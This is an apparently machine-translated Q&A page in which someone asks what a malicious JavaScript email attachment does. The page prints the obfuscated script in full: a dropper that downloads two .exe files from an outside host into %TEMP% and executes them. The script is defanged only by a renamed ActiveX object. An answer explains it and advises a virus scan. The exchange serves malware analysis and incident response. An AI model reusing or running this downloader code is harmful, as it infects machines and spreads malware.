需要帮助弄清楚这个 Js 的作用

Need help figuring out what this Js does

本文关键字:Js 作用 帮助 弄清楚      更新时间:2023-09-26

如果有人知道这个java脚本文件中发生了什么,你能告诉我吗?我们的一个客户收到了这封电子邮件,嗯...现在她无法打开任何文档或电子表格。看起来它也传播到网络的其余部分。

如果有人能帮助我理解它,我将不胜感激。

我已经删除了它,而不是我希望其他人掌握的东西。

我可能不需要告诉任何人,但除非它在沙盒中,否则请不要打开它。如果你砌你的电脑,我概不负责。

来源: PM 我为文件而不是..

基本上,它正在将病毒下载到您的临时文件夹并执行它......

您应该在整个网络上运行病毒扫描。

var AxProxy = function() {};
(function () {
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "''" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');
        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');
                g38['open']();
                g38['type'] = 1;
                g38['write'](OG4['ResponseBody']);
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);
                g38['close']();
            }
        };
        try {
            OG4['open']('GET', fr, false);
            OG4['send']();
            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);
            }
        } catch (er) {};
    }
    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();

所有其他变量都只是胡言乱语,旨在混淆和阻止解码。

PS:我已经代理了ActiveXObject所以这不能运行...